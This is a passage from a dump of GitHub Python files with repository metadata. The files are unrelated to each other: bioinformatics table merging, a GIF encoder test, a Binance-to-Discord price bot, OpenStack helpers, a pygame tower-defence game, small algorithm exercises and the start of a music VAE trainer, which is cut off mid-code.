join_dfs = combine_experiment_tables(data_dir, output_dir, join_dfs)\n return join_dfs\n\n\ndef combine_primary_tables(data_dir, output_dir):\n \"\"\"\n Build all the primary tables, i.e., tables that require no joins,\n and return them in a dictionary.\n\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] A dictionary of all the primary\n tables, with names as keys\n \"\"\"\n # Load, concatenate, and write primary tables to disk\n tissue_df = load_join_write('tissue', data_dir, output_dir)\n drug_df = load_join_write('drug', data_dir, output_dir)\n gene_df = load_join_write('gene', data_dir, output_dir)\n dataset_df = load_join_write('dataset', data_dir, output_dir)\n\n # Transform tables to be used for joins\n dfs = {}\n dfs['tissue'] = rename_and_key(tissue_df, 'tissue_id')\n dfs['drug'] = rename_and_key(drug_df, 'drug_id')\n dfs['gene'] = rename_and_key(gene_df, 'gene_id')\n dfs['dataset'] = rename_and_key(dataset_df, 'dataset_id')\n return dfs\n\n\ndef combine_secondary_tables(data_dir, output_dir, join_dfs):\n \"\"\"\n Build all secondary tables, i.e., all tables that have foreign keys corresponding\n to primary keys of primary tables. The function reads PSet tables from \n data_dir, concatenates and joins them with tables from join_dfs, and \n writes them to output_dir.\n\n @param join_dfs: [`dict(string: datatable.Frame)`] A dictionary of all the primary\n tables, with names as keys\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] The updated dictionary of join tables\n \"\"\"\n # Build cell table and add to join_dfs dictionary\n cell_df = load_join_write(\n 'cell', data_dir, output_dir, ['tissue'], join_dfs)\n join_dfs['cell'] = rename_and_key(cell_df, 'cell_id')\n\n # Build drug annotation table\n load_join_write('drug_annotation', data_dir,\n output_dir, ['drug'], join_dfs, add_index=False)\n # Build gene annotation table\n gene_annot_df = load_table('gene_annotation', data_dir)\n # Remove any rows with no actual annotations (no symbol)\n gene_annot_df = gene_annot_df[dt.f.symbol > \"\", :]\n # Join the other way so that genes that got cut out are included back in\n gene_annot_df.key = 'gene_id'\n gene_annot_df = join_tables(join_dfs['gene'], gene_annot_df, 'gene_id')\n write_table(gene_annot_df, 'gene_annotation', output_dir, add_index=False)\n\n # Build join tables\n load_join_write('dataset_cell', data_dir, output_dir,\n ['dataset', 'cell'], join_dfs, add_index=False)\n load_join_write('dataset_tissue', data_dir, output_dir,\n ['dataset', 'tissue'], join_dfs, add_index=False)\n # TODO: temporary workaround for dataset_compound until we standardize drug -> compound\n dataset_compound_df = load_table('dataset_compound', data_dir)\n dataset_compound_df = join_tables(\n dataset_compound_df, join_dfs['dataset'], 'dataset_id')\n compound_df = join_dfs['drug'].copy()\n compound_df.names = {'drug_id': 'compound_id'}\n dataset_compound_df = join_tables(\n dataset_compound_df, compound_df, 'compound_id')\n dataset_compound_df = write_table(\n dataset_compound_df, 'dataset_compound', output_dir, add_index=False)\n\n # Build all other secondary tables\n load_join_write('mol_cell', data_dir, output_dir,\n ['cell', 'dataset'], join_dfs)\n # mol_cells has Kallisto. not sure why. from CTRPv2 (TODO)\n load_join_write('dataset_statistics', data_dir,\n output_dir, ['dataset'], join_dfs)\n load_join_write('gene_drug', data_dir, output_dir, [\n 'gene', 'drug', 'dataset', 'tissue'], join_dfs)\n\n return join_dfs\n\n\ndef combine_experiment_tables(data_dir, output_dir, join_dfs):\n \"\"\"\n Load and process experiment table, then use it to build the dose response\n and profile tables. Drop the 'name' column from the experiment table before\n writing to a CSV.\n\n @param join_dfs: [`dict(string: datatable.Frame)`]\n @param data_dir: [`string`] The file path to the PSet tables\n @param output_dir: [`string`] The file path to the final tables\n @return: [`None`]\n \"\"\"\n # Load all experiments from PSets\n experiment_df = load_join_write('experiment', data_dir, output_dir, [\n 'cell', 'drug', 'dataset', 'tissue'], join_dfs)\n # Don't write the 'name' column\n experiment_df[:, ['id', 'cell_id', 'drug_id', 'dataset_id', 'tissue_id']].to_csv(\n os.path.join(output_dir, 'experiment.csv'))\n\n # Rename columns and key experiment table based on experiment name and dataset id\n experiment_df.names = {'name': 'experiment_id'}\n experiment_df = experiment_df[:, ['id', 'experiment_id', 'dataset_id']]\n experiment_df.key = ('dataset_id', 'experiment_id')\n join_dfs['experiment'] = experiment_df\n\n # Nearly the same code as in load_join_write but has special case handling\n for df_name in ['dose_response', 'profile']:\n df = load_table(df_name, data_dir)\n for fk in ['dataset', 'experiment']:\n df = join_tables(df, join_dfs[fk], fk+'_id')\n del df[:, 'dataset_id']\n write_table(df, df_name, output_dir,\n add_index=(df_name == 'dose_response'))\n\n return join_dfs\n\n\ndef load_join_write(name, data_dir, output_dir, foreign_keys=[], join_dfs=None, add_index=True):\n \"\"\"\n Given the name of a table, load all PSet tables of that name from data_dir,\n join them to any foreign key tables (specified by foreign_keys), and write\n the final combined and joined table to output_dir as a CSV.\n\n @param name: [`string`] The name of the table\n @param data_dir: [`string`] File path to the directory with all PSet tables\n @param output_dir: [`string`] The file path to the final tables\n @param foreign_keys: [`list(string)`] An optional list of tables that this table\n needs to be joined with\n @param join_dfs: [`dict(string: datatable.Frame)`] An optional dictionary of join\n tables (for building out foreign keys); keys are table names\n @param add_index: [`bool`] Indicates whether or not to add a primary key (1-nrows)\n when writing the final table to a .csv\n @return: [`datatable.Frame`] The final combined and joined table\n \"\"\"\n df = load_table(name, data_dir)\n if foreign_keys and join_dfs is None:\n raise TypeError(f'The {name} table has foreign keys {foreign_keys} '\n 'but you have not passed any join tables.')\n\n for fk in foreign_keys:\n df = join_tables(df, join_dfs[fk], fk+'_id')\n\n df = write_table(df, name, output_dir, add_index)\n return df\n\n\ndef load_table(name, data_dir):\n \"\"\"\n Load all PSet tables with name into a datatable, dropping any duplicate rows.\n\n @param name: [`string`] The name of the table\n @param data_dir: [`string`] File path to the directory with all PSet tables\n @return: [`datatable.Frame`] A datatable containing all rows from all PSets\n \"\"\"\n # Get all files\n files = glob.glob(os.path.join(data_dir, '**', f'*{name}.csv'))\n # Filter so that file path are '{data_dir}/{pset}/{pset}_{name}.csv'\n files = [file_name for file_name in files if re.search(\n data_dir + r'/(\\w+)/\\1_' + name + '.csv$', file_name)]\n # Read and concatenate tables\n df = rbind(*iread(files, sep=','))\n # Replace any empty strings with None/NA\n df.replace(\"\", None)\n # Drop duplicates\n # (groups by all columns and selects only the first row from each group)\n df = df[0, :, by(df.names)]\n\n return df\n\n\ndef rename_and_key(df, join_col, og_col='name'):\n \"\"\"\n Prepare df to be joined with other tables by renaming the column\n on which it will be joined and by keying it.\n\n @param df: [`datatable.Frame`] The table to be keyed.\n @param join_col: [`string`] The name of the join column in other tables\n (ex. 'tissue_id', 'cell_id', etc.)\n @param og_col: [`string`] The name of the join column in the join table\n @return: [`datatable.Frame`] The keyed and renamed table\n \"\"\"\n # Rename primary key to match foreign key name (necessary for joins)\n df.names = {og_col: join_col}\n # Only select necessary rows\n df = df[:, ['id', join_col]]\n # Set the key\n df.key = join_col\n return df # Not necessary? df passed by reference\n\n\ndef join_tables(df1, df2, join_col):\n \"\"\"\n Join df2 and df1 based on join_col (left outer join by default).\n\n @param df1: [`datatable.Frame`] The datatable with the foreign key\n @param df2: [`datatable.Frame`] The join table (ex. tissue datatable)\n @param join_col: [`string`] The name of the columns on which the tables\n will be joined (ex. 'tissue_id')\n @return [`datatable.Frame`] The new, joined table\n \"\"\"\n if (join_col not in df1.names) or (join_col not in df2.names):\n print(f'{join_col} is missing from one or both of the datatables passed!',\n 'Make sure you have prepared df2 using rename_and_key().')\n return None\n\n # Join tables, then rename the join col and drop it\n df = df1[:, :, join(df2)]\n df.names = {join_col: 'drop', 'id': join_col}\n del df[:, 'drop']\n return df\n\n\ndef write_table(df, name, output_dir, add_index=True):\n \"\"\"\n Add a primary key to df ('id' column) and write it to output_dir\n as a .csv file.\n\n @param df: [`datatable.Frame`] A PharmacoDB table\n @param name: [`string`] The name of the table\n @param output_dir: [`string`] The directory to write the table to\n @return: [`datatable.Frame`] The indexed PharmacoDB table\n \"\"\"\n print(f'Writing {name} table to {output_dir}...')\n if add_index:\n # Index datatable\n df = cbind(dt.Frame(id=np.arange(df.nrows) + 1), df)\n # Write to .csv\n df.to_csv(os.path.join(output_dir, f'{name}.csv'))\n return df\n","repo_name":"bhklab/DataIngestion","sub_path":"PharmacoDI/PharmacoDI/combine_pset_tables.py","file_name":"combine_pset_tables.py","file_ext":"py","file_size_in_byte":11033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6955337226","text":"import unittest\n\nimport os\nfrom gif_me_hd.parse import *\nfrom gif_me_hd.encode import *\nfrom lzw_gif_cpp import compress\n\nDATASET = './dataset/'\n\n\nclass EncoderTester(unittest.TestCase):\n def setUp(self):\n self.filenames = os.listdir(DATASET)\n self.actual_path = [os.path.join(DATASET, x) for x in self.filenames]\n self.gifs = [GifReader(x).parse() for x in self.actual_path]\n\n def test_saved_reparsed_gif(self):\n # Test case 1+2\n # Save the GIF files\n test_dir = 'output/'\n os.makedirs(test_dir,exist_ok=True)\n for index, gif in enumerate(self.gifs):\n encoder = GifEncoder(os.path.join(\n test_dir, f'encoded_{self.filenames[index]}'))\n encoder.encode(gif, compress)\n encoder.to_file()\n # Reparse the saved files\n self.parsed_gifs = [GifReader(os.path.join(\n test_dir, f'encoded_{filename}')).parse() for filename in self.filenames]\n \n # Re-save parsed\n for index, gif in enumerate(self.parsed_gifs):\n encoder = GifEncoder(os.path.join(\n test_dir, f're-encoded_{self.filenames[index]}'))\n encoder.encode(gif, compress)\n encoder.to_file()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"GIF-ME-HD/gif_me_hd_proto","sub_path":"tests/test_encoder.py","file_name":"test_encoder.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1077924125","text":"from binance.client import Client\nfrom time import sleep\nfrom discord_webhook import DiscordWebhook\nimport requests\n\nAPI_KEY = ''\nSECRET_KEY = ''\n\nclient = Client(API_KEY, SECRET_KEY)\n \ndef live_price():\n price = client.get_symbol_ticker(symbol='BTCUSDT')\n print(f\"Anlık Fiyat: {'BTCUSDT'}: {price['price']}\")\n webhook_url = 'webhook url'\n # Mesajınızı oluşturun\n message = f\"{'BTCUSDT'} fiyatı {price['price']} USDT\"\n # Webhook'u post edin\n requests.post(webhook_url, data={\"content\": message})\n\n\nwhile True:\n price = client.get_symbol_ticker(symbol='BTCUSDT')\n live_price()\n sleep(1000)\n","repo_name":"kaanguler4/Discord-Webhook-Bitcoin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25824901752","text":"import logging\n\nfrom novaclient.v1_1 import client as nova_client\n\nimport savanna.utils.openstack.base as base\n\n\ndef novaclient(headers):\n username = headers['X-User-Name']\n token = headers['X-Auth-Token']\n tenant = headers['X-Tenant-Id']\n compute_url = base.url_for(headers, 'compute')\n\n logging.debug('novaclient connection created using token '\n '\"%s\", tenant \"%s\" and url \"%s\"',\n token, tenant, compute_url)\n\n nova = nova_client.Client(username, token, tenant,\n auth_url=compute_url)\n\n nova.client.auth_token = token\n nova.client.management_url = compute_url\n\n return nova\n\n\ndef get_flavors(headers):\n flavors = [flavor.name for flavor\n in novaclient(headers).flavors.list()]\n return flavors\n\n\ndef get_flavor(headers, **kwargs):\n return novaclient(headers).flavors.find(**kwargs)\n\n\ndef get_images(headers):\n images = [image.id for image\n in novaclient(headers).images.list()]\n return images\n\n\ndef get_limits(headers):\n limits = novaclient(headers).limits.get().absolute\n return dict((l.name, l.value) for l in limits)\n","repo_name":"darionyaphets/savanna","sub_path":"savanna/utils/openstack/nova.py","file_name":"nova.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3432607467","text":"import pygame\nimport sys\n\nfrom settings import *\nfrom level import Level\nfrom menu import Menu, Button\nfrom ui import UI\nfrom debug import debug\nfrom game_data import turrets_data\n\n\nclass Game:\n def __init__(self):\n self.coins_amount = 100\n self.life = 5\n self.turret_selected = 1\n\n self.status = 'menu'\n self.start_menu = Menu(screen,\n \"Tower Defence\",\n [\n Button(screen,\n self.create_level, \"Start\", 200, 50),\n Button(screen,\n self.create_level, \"Settings\", 200, 50),\n Button(screen,\n self.quit_game, \"Quit\", 200, 50)\n ])\n\n self.level = Level(screen, self.turret_selected, self.change_turret_selected, self.coins_amount,\n self.change_coins, self.change_life)\n\n # User interface\n self.ui = UI(screen, self.quit_game,\n self.create_menu)\n\n def quit_game(self):\n pygame.quit()\n sys.exit()\n\n def change_coins(self, amount):\n self.coins_amount += amount\n\n def change_life(self, amount):\n self.life += amount\n\n def change_turret_selected(self, choice):\n self.turret_selected = choice\n for turret_type in turrets_data:\n turrets_data[turret_type]['is_selected'] = False\n turrets_data[f\"0{self.turret_selected}\"]['is_selected'] = True\n\n def create_menu(self):\n self.start_menu = Menu(screen,\n \"Tower Defence\",\n [\n Button(screen,\n self.create_level, \"Start\", 200, 50),\n Button(screen,\n self.create_level, \"Settings\", 200, 50),\n Button(screen,\n self.quit_game, \"Quit\", 200, 50)\n ],\n \"graphics/ui/start_menu_banner.png\",)\n self.status = 'menu'\n\n def create_level(self):\n self.level = Level(screen, self.turret_selected, self.change_turret_selected, self.coins_amount,\n self.change_coins, self.change_life)\n self.status = 'level'\n\n def create_game_over_menu(self):\n self.game_over_menu = Menu(screen,\n \"Game Over\",\n [\n Button(screen,\n self.create_level, \"Restart\", 200, 50),\n Button(screen,\n self.create_menu, \"Go to home\", 200, 50),\n Button(screen,\n self.quit_game, \"Quit\", 200, 50)\n ])\n self.status = 'game_over_menu'\n\n def run(self):\n if self.status == 'menu':\n self.start_menu.run()\n elif self.status == 'game_over_menu':\n self.game_over_menu.run()\n else:\n self.level.run()\n self.ui.show()\n self.ui.show_coins(self.coins_amount)\n self.ui.show_life(self.life)\n self.ui.draw_turret_panel(self.change_turret_selected)\n # self.ui.draw_wave_timer(20)\n\n if self.life <= 0:\n self.create_game_over_menu()\n\n\n# Setup level\npygame.mixer.pre_init(44100, -16, 2, 512)\npygame.init()\n\n# pygame.mixer.music.load('sound/music.wav')\n# pygame.mixer.music.play(-1)\n\nscreen = pygame.display.set_mode(\n (screen_width, screen_height), pygame.SCALED + pygame.RESIZABLE)\npygame.display.set_caption(\"Tower Defence\")\nclock = pygame.time.Clock()\ngame = Game()\n\n# Game loop\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n screen.fill('black')\n game.run()\n\n debug(pygame.mouse.get_pos(), 70)\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"Instelce/TowerDefence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42903370212","text":"###########################################################################\n# Python (v3.8.5) script enrichment.py (v1.0) to calculate enrichments\n# Last update: 2022_06_07\n# Author: Michelle Almeida da Paz\n###########################################################################\n\n#!/usr/bin/env python\n\nimport math\nimport argparse\nimport os\nimport sys\n\nparser = argparse.ArgumentParser(description='T3E: Enrichment')\nparser.add_argument('--version', action='version', version='%(prog)s 1.0')\nparser.add_argument('--background', action='store', metavar = 'background', help='background file created by T3E [Example: sample001_background.txt]')\nparser.add_argument('--signal', action='store', metavar = 'signal', help='ChIP-seq sample experiment counts [.txt format]')\nparser.add_argument('--iter', action='store', metavar = 'iter', help='number of interations [Example: 100]')\nparser.add_argument('--alpha', action='store', metavar = 'alpha', help='level of significance to report enrichment [Example: 0.05]')\nparser.add_argument('--enrichment', action='store', metavar = 'enrichment', help='log2FC threshold to report enrichment [Example: 1.0]')\nparser.add_argument('--outputfolder', action='store', metavar = 'outputfolder', help='output folder path [Example: /results]')\nparser.add_argument('--outputprefix', action='store', metavar = 'outputprefix', help='prefix name of your analysis [Example: sample001]')\nargs = parser.parse_args()\n\nif (len(sys.argv) == 1):\n\tparser.print_help()\n\tparser.exit()\n\nbackground = args.background\nsignal = args.signal\nnum_iter = int(args.iter)\nalpha = float(args.alpha)\nenrichment = float(args.enrichment)\noutputprefix = args.outputprefix\noutput = args.outputfolder + os.path.sep + outputprefix + '_enrichment.txt'\n\ndef open_signal(sample):\n\twith open(sample, \"r\") as s:\n\t\tfor line in s:\n\t\t\tline = line.rstrip()\n\t\t\t(repeat, counts) = line.split(\"\\t\")\n\t\t\trepeats_counts[repeat] = counts\n\t\t\tqt[repeat] = 0\n\t\t\tsum_backg[repeat] = 0\n\treturn repeats_counts\n\t\ndef open_iterations(iterations):\n\twith open(iterations, \"r\") as i:\n\t\tfor line in i:\n\t\t\tline = line.rstrip()\n\t\t\t(iterate, repeat, counts) = line.split(\"\\t\")\n\t\t\tif repeat in repeats_counts:\n\t\t\t\tif (float(counts) > float(repeats_counts[repeat])):\n\t\t\t\t\tqt[repeat] += 1\n\t\t\t\tsum_backg[repeat] += float(counts)\n\treturn qt, sum_backg\n\nrepeats_counts = {}\nqt = {}\nsum_backg = {}\nrepeats_counts = open_signal(signal)\n\nqt, sum_backg = open_iterations(background)\n\nwith open(output, \"w\") as o:\n\tfor repeat in sum_backg.keys():\n\t\tpvalue = qt[repeat]/num_iter\n\t\tmean = sum_backg[repeat]/num_iter\n\t\tif (mean > 0):\n\t\t\tfoldchange = float(repeats_counts[repeat])/mean\n\t\t\tlog2fc = math.log(foldchange,2)\n\t\t\tif ((pvalue <= alpha) and (log2fc >= enrichment)):\n\t\t\t\tprint(repeat, pvalue, log2fc)\n\t\t\tprint(repeat, \"\\t\", pvalue, \"\\t\", log2fc, file=o)\n","repo_name":"michelleapaz/T3E","sub_path":"scripts/enrichment.py","file_name":"enrichment.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"10663564094","text":"def heapify(arr, n, i):\n largest = i # i is the node to heapify down\n l = 2 * i + 1 # left\n r = 2 * i + 2 # right\n if l < n and arr[i] < arr[l]:\n largest = l\n if r < n and arr[largest] < arr[r]:\n largest = r\n if largest != i: # do heapify down\n arr[i], arr[largest] = arr[largest], arr[i]\n heapify(arr, n, largest)\n\ndef heapSort(arr):\n n = len(arr)\n # Build a max heap\n for i in range(n//2-1, -1, -1): # last parent is n//2-1\n heapify(arr, n, i) # heapify every node\n # One by one extract elements\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i] # swap root to end of unsorted part of arr\n heapify(arr, i, 0) # heapify root\n","repo_name":"megwu1129/Leetcode","sub_path":"L7-Heapsort.py","file_name":"L7-Heapsort.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"39730205765","text":"import sys\nimport os\nimport re\nf = re.compile(\".*/avocado-cockpit\")\nsys.path.append(f.findall(os.path.abspath(\n os.path.abspath(os.path.dirname(__file__))))[0])\nimport time\nfrom avocado import Test\nfrom avocado import main\nfrom libs import general\n\n\nclass TestHostname(Test):\n \"\"\"\n : avocado: enable\n \"\"\"\n default_params = {'timeout': 30}\n\n def setUp(self):\n self.pretty_name = self.params.get('pretty')\n self.real_name = self.params.get('real')\n self.ipaddr = self.params.get('ipaddr')\n self.port = self.params.get('port')\n self.testurl = \"http://%s:%s\" % (self.ipaddr, self.port)\n self.username = self.params.get('name', \"/*/user1/\")\n self.passwd = self.params.get('passwd', \"/*/user1/\")\n web_driver_obj = general.LoginCockpit(\n self.ipaddr, self.username, self.passwd, self.port)\n self.web_driver = web_driver_obj.run()\n self.ssh_conn_obj = general.EstabSSHConnect(self.ipaddr, self.username, self.passwd)\n\n def display_hostname_in_cockpit(self):\n web_driver = self.web_driver\n web_driver.switch_to.parent_frame()\n web_driver.implicitly_wait(10)\n time.sleep(1)\n web_driver.switch_to.frame(\"cockpit1:localhost/system\")\n display_hostname = web_driver.find_element_by_id(\n \"system_information_hostname_button\").text\n return display_hostname\n\n def _test_default_hostname(self):\n display_hostname = self.display_hostname_in_cockpit()\n self.log.info(\"The hostname shown in cockpit page is: %s\" % display_hostname)\n current_hostname = self.ssh_conn_obj.get_hostname()\n if display_hostname.strip() == current_hostname.strip():\n self.log.info(\"The hostname shown in cockpit page[%s] is the same as system[%s]!\" % (display_hostname, current_hostname))\n result = 0\n else:\n self.log.error(\"The hostname shown in cockpit page[%s] is not the same as system[%s]!\" % (display_hostname, current_hostname))\n result = 1\n return result\n\n\n def change_hostname(self):\n web_driver = self.web_driver\n web_driver.implicitly_wait(10)\n web_driver.switch_to.parent_frame()\n web_driver.switch_to_frame(\"cockpit1:localhost/system\")\n web_driver.implicitly_wait(10)\n web_driver.find_element_by_id(\"system_information_hostname_button\").click()\n web_driver.find_element_by_id(\"sich-pretty-hostname\").clear()\n web_driver.find_element_by_id(\"sich-pretty-hostname\").send_keys(self.pretty_name)\n web_driver.find_element_by_id(\"sich-hostname\").clear()\n web_driver.find_element_by_id(\"sich-hostname\").send_keys(self.real_name)\n web_driver.find_element_by_id(\"sich-apply-button\").click()\n\n def check_hostname_after_change(self):\n display_hostname = self.display_hostname_in_cockpit()\n self.log.info(\"The hostname shown in cockpit page is: %s\" % display_hostname)\n current_hostname = self.ssh_conn_obj.get_hostname()\n self.log.info(\"The hostname in system is: %s\" % current_hostname)\n aimed_hostname = \"%s (%s)\" % (self.pretty_name, self.real_name)\n result = 0\n if current_hostname == aimed_hostname:\n self.log.info(\"Setup hostname in system succeed!\")\n self.log.info(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.info(\"Actually hostname in system is: %s\" % current_hostname)\n result += 0\n else:\n self.log.error(\"Setup hostname in cockpit failed!\")\n self.log.error(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.error(\"Actually hostname in system is: %s\" % current_hostname)\n result += 1\n\n if display_hostname == aimed_hostname:\n result += 0\n self.log.info(\"Cockpit display the right hostname as setup!\")\n self.log.info(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.info(\"Actually hostname in system is: %s\" % display_hostname)\n else:\n self.log.error(\"Cockpit display the hostname different from setup!\")\n self.log.error(\"Aimed hostname is: %s\" % aimed_hostname)\n self.log.error(\"Cockpit display the hostname is: %s\" % display_hostname)\n result += 1\n return result\n\n def _test_change_hostname_in_cockpit(self):\n self.change_hostname()\n result = self.check_hostname_after_change()\n return result\n\n def test(self):\n t_result = self._test_default_hostname()\n t_result += self._test_change_hostname_in_cockpit()\n self.assertEqual(0, t_result, 'Hostname test failed!')\n\n def tearDown(self):\n self.web_driver.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maggiewang1117/avocado_test_cockpit","sub_path":"testcases/basic/hostname.py","file_name":"hostname.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16216471918","text":"def first_word(text: str) -> str:\n\n string = ''\n \n \n for char in text:\n \n if char.isupper() or char.isdigit() or char.islower() or char == \"'\": # делаем проверку нужных нам символов\n string += ''.join(char)\n \n elif len(string) > 0: # проверка на нулевую строку\n\n answer = ''\n gate = True\n\n for char in string:\n\n if char.islower() or char.isupper() or char == \"'\": # добавляем нужные по заданию символы в ответ\n answer += char\n\n else:\n answer = ''\n string = ''\n gate = False # если добавлений нет закрываем вход\n break # и ломаем цикл\n\n if gate:\n return answer\n\n return text\n \nif __name__ == '__main__':\n print(\"Example:\")\n print(first_word(\"Hello world\"))\n \n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert first_word(\"Hello world\") == \"Hello\"\n assert first_word(\" a word \") == \"a\"\n assert first_word(\"don't touch it\") == \"don't\"\n assert first_word(\"greetings, friends\") == \"greetings\"\n assert first_word(\"... and so on ...\") == \"and\"\n assert first_word(\"hi\") == \"hi\"\n assert first_word(\"Hello.World\") == \"Hello\"\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n ","repo_name":"PontificSalivan/Checkio","sub_path":"Home tasks/first_word.py","file_name":"first_word.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699622658","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n \n pseudoHead = ListNode()\n head = pseudoHead\n \n t1, t2 = l1, l2\n carry = 0\n while t1 and t2:\n q, r = divmod(t1.val + t2.val + carry, 10)\n head.next = ListNode(r)\n head = head.next\n t1, t2 = t1.next, t2.next\n carry = q\n \n t1 = t1 if t1 else t2\n \n while t1:\n q, r = divmod(t1.val + carry, 10)\n head.next = ListNode(r)\n head = head.next\n t1 = t1.next\n carry = q\n \n if carry:\n head.next = ListNode(carry)\n \n return pseudoHead.next","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8515830532","text":"cents = int(input('Money in Cents: '))\r\ntoonies = 0\r\nloonies = 0\r\nquarters = 0\r\ndimes = 0\r\nnickels = 0\r\npennies = 0\r\nwhile cents != 0:\r\n if cents >= 200:\r\n cents -= 200\r\n toonies += 1\r\n elif cents >= 100:\r\n cents -= 100\r\n loonies += 1\r\n elif cents >= 25:\r\n cents -= 25\r\n quarters += 1\r\n elif cents >= 10:\r\n cents -= 10\r\n dimes += 1\r\n elif cents >= 5:\r\n cents -= 5\r\n nickels += 1\r\n elif cents >= 1:\r\n cents -= 1\r\n pennies += 1\r\n\r\nprint(f'Toonies: {toonies}')\r\nprint(f'Loonies: {loonies}')\r\nprint(f'Quarters: {quarters}')\r\nprint(f'Dimes: {dimes}')\r\nprint(f'Nickels: {nickels}')\r\nprint(f'Pennies: {pennies}')","repo_name":"nicholaspoon03/wave_1","sub_path":"making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71414623132","text":"import os\nimport json\nimport torch\nfrom tqdm import tqdm\nimport music21\nfrom typing import Tuple\nimport pandas as pd\n\nfrom helpers import concatenate_scores\nfrom src.utils.trainer import Trainer\nfrom src.dmelodiesvae.dmelodies_vae import DMelodiesVAE\nfrom src.utils.helpers import to_cuda_variable_long, to_cuda_variable, to_numpy\nfrom src.utils.evaluation import *\nfrom src.utils.plotting import *\n\n\nLATENT_ATTRIBUTES = {\n 'tonic': 0,\n 'octave': 1,\n 'mode': 2,\n 'rhythm_bar1': 3,\n 'rhythm_bar2': 4,\n 'arp_chord1': 5,\n 'arp_chord2': 6,\n 'arp_chord3': 7,\n 'arp_chord4': 8\n}\n\nLATENT_NORMALIZATION_FACTORS = torch.tensor(\n [11, 2, 2, 27, 27, 1, 1, 1, 1],\n dtype=torch.float32\n)\n\n\nclass DMelodiesVAETrainer(Trainer):\n def __init__(\n self,\n dataset,\n model: DMelodiesVAE,\n model_type='beta-VAE',\n lr=1e-4,\n beta=0.001,\n gamma=1.0,\n delta=10.0,\n capacity=0.0,\n device=0,\n rand=0,\n ):\n super(DMelodiesVAETrainer, self).__init__(dataset, model, lr)\n self.model_type = model_type\n self.attr_dict = LATENT_ATTRIBUTES\n self.attr_norm_factors = LATENT_NORMALIZATION_FACTORS\n self.reverse_attr_dict = {\n v: k for k, v in self.attr_dict.items()\n }\n self.metrics = {}\n self.beta = beta\n self.capacity = capacity\n # self.capacity = to_cuda_variable(torch.FloatTensor([capacity]))\n self.cur_epoch_num = 0\n self.warm_up_epochs = 10\n self.num_iterations = 100000\n if self.model_type == 'beta-VAE':\n self.exp_rate = np.log(1 + self.beta) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = self.capacity\n self.cur_capacity = self.capacity\n elif self.model_type == 'annealed-VAE':\n self.exp_rate = np.log(1 + self.capacity) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = 0.0\n self.cur_capacity = self.start_capacity\n elif self.model_type == 'ar-VAE':\n self.exp_rate = np.log(1 + self.beta) / self.num_iterations\n self.start_beta = 0.0\n self.cur_beta = self.start_beta\n self.start_capacity = self.capacity\n self.cur_capacity = self.capacity\n self.gamma = gamma\n self.delta = delta\n self.anneal_iterations = 0\n self.device = device\n self.rand_seed = rand\n torch.manual_seed(self.rand_seed)\n np.random.seed(self.rand_seed)\n self.trainer_config = f'_{self.model_type}_b_{self.beta}_c_{self.capacity}_'\n if model_type == 'ar-VAE':\n self.trainer_config += f'g_{self.gamma}_d_{self.delta}_'\n self.trainer_config += f'r_{self.rand_seed}_'\n self.model.update_trainer_config(self.trainer_config)\n\n def update_scheduler(self, epoch_num):\n \"\"\"\n Updates the training scheduler if any\n :param epoch_num: int,\n \"\"\"\n if epoch_num > self.warm_up_epochs:\n if self.anneal_iterations < self.num_iterations:\n if self.model_type == 'beta-VAE':\n self.cur_beta = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n elif self.model_type == 'annealed-VAE':\n self.cur_beta = self.beta\n self.cur_capacity = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n elif self.model_type == 'ar-VAE':\n self.cur_beta = -1.0 + np.exp(self.exp_rate * self.anneal_iterations)\n self.anneal_iterations += 